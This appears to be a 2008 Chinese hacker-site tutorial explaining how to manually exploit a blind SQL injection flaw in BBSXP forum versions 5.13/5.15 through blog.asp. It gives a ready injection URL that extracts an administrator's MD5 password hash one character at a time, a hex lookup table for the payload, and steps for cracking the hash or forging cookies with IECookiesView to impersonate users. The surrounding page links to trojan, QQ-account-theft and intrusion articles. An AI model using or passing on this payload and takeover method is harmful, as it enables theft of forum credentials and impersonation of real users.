设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 入侵技术 -> 文章内容 [站内搜索]  

 
BBSXP论坛手工得到用户md5密码的方法
作者:不详  来源:网络  发布时间:2008-7-26 11:59:29  发布人:www.hack86.com
BBSXP论坛手工得到用户md5密码的方法 
 

大家都知道BBSXP论坛5.13,5.15版本的blog.asp文件存在注入漏洞,网上也有几种这个漏洞的利用软件,可是有不少网友反映使用这些软件有时候无法成功得到完整的32位md5密码,还有一些利用软件被捆绑了木马,所以我在本文介绍一种手工得到注册用户32位md5密码的方法。 
我们可以通过提交下面的代码测试用户名为admin的32位md5密码中的第十位是否为3:

/blog.asp?id=1%09and%09exists%09(select%09*%09from%09[user]%09where%
09username=0x610064006D0069006E00%09and%09substring(userpass,10,1)=0x33)
 

如果是3的话,该日志就会返回正常的页面,否则会提示“该用户暂时没有任何日志”。其中

select%09*%09from%09[user]%09where%09username=0x610064006D0069006E00%09and%
09substring(userpass,10,1)=0x33
 

这是一条select语句,意思是得到从user表中选出某条记录的username列=0x610064006D0069006E00并且该记录的userpass列的第10个字符=0x33 。

select的语法为:
SELECT FieldOFTableList
INTO VariableList
FROM TableName
WHERE Criteria;
 

其中FieldOFTableList代表接收数据的变量名列表,VariableList代表获得检索结果的变量,TableName代表被检索的表名,Criteria是检索条件。

0x610064006D0069006E00是admin转换成十六进制得到的,这个字符串我们可以使用“ASCII及进制转换”这个小工具转换得到,如图1所示。

javascript:return big(this)" src="/article/UploadPic/2008-7/20087261318209.gif" onload="javascript:if(this.width>498)this.style.width=498;"> 
图1 


0x33是3转换成十六进制得到的,从0到9,a到f的十六进制对应如下:


0 0x30  
1 0x31  
2 0x32  
3 0x33  
4 0x34  
5 0x35  
6 0x36  
7 0x37  
8 0x38  
9 0x39
a 0x61  
b 0x62  
c 0x63  
d 0x64  
e 0x65  
f 0x66
 

如果用户名是汉字,比如一个用户名为“测试”,那“测试”这个字符串转换成十六进制为0x B2E200CAD400,因为一个汉字占用两个字节的内存。这样经过不断的测试,会最终得到一个32位的md5密码,这时我们可以md5密码破解类软件进行破解,或者到一些md5密码破解网站进行破解(2006年第1期第27页有专门的介绍),如果密码过于复杂,破解不出明文密码,那我们就可以使用IECookiesView这款软件进行cookie欺骗了,打开IECookiesView,找到BBSXP论坛的网址,分别将username和userpass改为要冒充的ID和我们得到的密码,并保存,如图2所示。

javascript:return big(this)" style="WIDTH: 498px; HEIGHT: 356px" height=396 alt="" src="/article/UploadPic/2008-7/20087261319298.gif" width=809 onload="javascript:if(this.width>498)this.style.width=498;" border=0>  
图2 


然后重新打开一个ie页面,再访问该论坛,就会发现我们成为要冒充的用户了。在这里有个地方需要注意一下,我们在进行Cookie欺骗时,要将得到32位的md5密码中的字母设置为大写的,否则Cookie欺骗无法成功。

本文的测试论坛版本为BBSXP论坛5.13SQL版。 

 
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  BBSXP论坛手工得到用..
BBSXP绕过过滤继续注..
BBSXP2008存在后台注..
UBB的跨站脚本攻击的..
Let me tell you ho..
推荐:BBSXP最新漏洞..
推荐:BBSXP最新漏洞..
Bbsxp 0day简单分析..
dxbbs漏洞(通杀7.3以..
bbsxp sql最新版再爆..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
免费QQ蓝钻体验(附考试答案)
18岁少女欲6000元卖处女身 救患血..
8款QQ空间免费开场动画
 
提升程序安全绝招 打造通用密码之.. 07-26
BBSXP论坛手工得到用户md5密码的.. 07-26
BBSXP论坛手工得到用户md5密码的.. 07-26
打造自己的XP+SP3无人值守安装光.. 07-26
入侵检测西安招聘网站 07-26
再记一次网站入侵 07-26
http-tunnel渗透 07-26
一段js的木马程序 07-26
主流与非主流提权技术大全 07-21
动网论坛XSS 07-21
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com